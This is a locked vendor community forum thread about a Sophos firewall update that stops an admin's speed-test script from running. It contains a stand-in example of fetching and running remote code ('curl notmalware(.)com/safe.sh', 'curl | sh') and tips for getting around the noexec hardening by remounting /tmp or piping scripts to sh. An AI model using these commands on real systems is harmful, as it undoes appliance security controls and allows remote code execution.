Sophos Firewall v22 EAP is now available! Click here to learn more.

Thread Info
Options
Suggested
This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

18.5.2 - Can't execute scripts anymore

Ryan Partington

We've been using a speed test script for years on our SG/XGs, just a heads up from 18.5.2 we now get permission denied.

Just to be sure, ran it on another 18.5.1 box, worked. Upgraded to 18.5.2, permission denied. May be worth checking any quality of life scripts you use to see if you're affected.



This thread was automatically locked due to age.
  • 0

    wget was removed on the appliance. Does your script use wget? 

    __________________________________________________________________________________________________________________

    • 0 in reply to LuCar Toni

      it does, do you know if there is an alternative? 

      https://github.com/rickoneeleven/pinescore/blob/master/111/ns_speedtest_v3.sh (i may remove this link in the future)

      ------------------------------------------------

      worlds number one free ICMP monitoring platform: https://pinescore.com

      • 0 in reply to Ryan Partington

        wget is a tricky one. Because as you use wget to download something for a "speedtest" attackers use the same kind of feature for automated attacks and payload. As to speak, the same kind of script could be a potential attack. Getting access to a firewall, execute a script and download more content.

        You could use curl, like the script does as well. 

        __________________________________________________________________________________________________________________

        • 0 in reply to LuCar Toni

          I'll try and give it a re-work, thanks

          ------------------------------------------------

          worlds number one free ICMP monitoring platform: https://pinescore.com

          • 0 in reply to LuCar Toni

            If the intended reason to remove wget from the firewall has only for security, why is curl still available?

            There's nothing stopping an attacker to use "curl notmalware(.)com/safe.sh > file.sh" then execute it.

            Or even curl | sh

            If a post solves your question use the 'Verify Answer' button.

            Ryzen 7900 + Mellanox ConnectX-3 (KVM) v22 EAP @ Home

            • 0 in reply to Prism

              hey cut it out you're going to leave me with no options Laughing

              ------------------------------------------------

              worlds number one free ICMP monitoring platform: https://pinescore.com

            • 0 in reply to LuCar Toni

              "curl" is blocked too, but actually, I don't think curl or wget are blocked, as I can wget or curl down the original file fine from the command line, it's just when I run the script I get permission denied, even if I remove the #!/bin/sh first line.

              So looks like calling an executable file in any way is blocked, is there a work around? Even if I remove the .sh extension, it's still permission denied 

              ------------------------------------------------

              worlds number one free ICMP monitoring platform: https://pinescore.com

              • 0 in reply to Ryan Partington

                You need to give execute permission with chmod +x ns_speedtest_v4.sh

                Example:

                Fullscreen
                XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

                If a post solves your question use the 'Verify Answer' button.

                Ryzen 7900 + Mellanox ConnectX-3 (KVM) v22 EAP @ Home

                • 0 in reply to Prism

                  sorry i'd left that bit out of screenshot, same issue. Maybe it works on v19, do you have any 18.5.2's to try:

                  ------------------------------------------------

                  worlds number one free ICMP monitoring platform: https://pinescore.com

                  • 0 in reply to Ryan Partington

                    Could be additional enhancements to protect the system itself. V19.0 EAP1 is not on the same stage of release cycle like MR2. 

                    The question remains, why would anybody execute scripts? 

                    __________________________________________________________________________________________________________________

                    • +1 in reply to Ryan Partington

                      Can you use "cat /proc/mounts" to see if /tmp is mounted with noexec?

                      If it is, you can remount it with exec permissions.

                      * (I'm on v19 EAP 1.)

                      EDIT: Also, I don't remember if this still works, but if you cat and pipe to sh - It should execute the script. (This should bypass filesystems that are mounted with noexec.)

                      Example: "cat test.sh | sh"

                      If a post solves your question use the 'Verify Answer' button.

                      Ryzen 7900 + Mellanox ConnectX-3 (KVM) v22 EAP @ Home

                      • 0 in reply to Prism

                        thank you, you've been very helpful. I'm back in business. 

                        ------------------------------------------------

                        worlds number one free ICMP monitoring platform: https://pinescore.com

                        • 0 in reply to Prism

                          Just had the same hiccup, for exactly the same reason, thanks !

                          For those wondering, it's as simple as;

                          mount -o remount,exec /tmp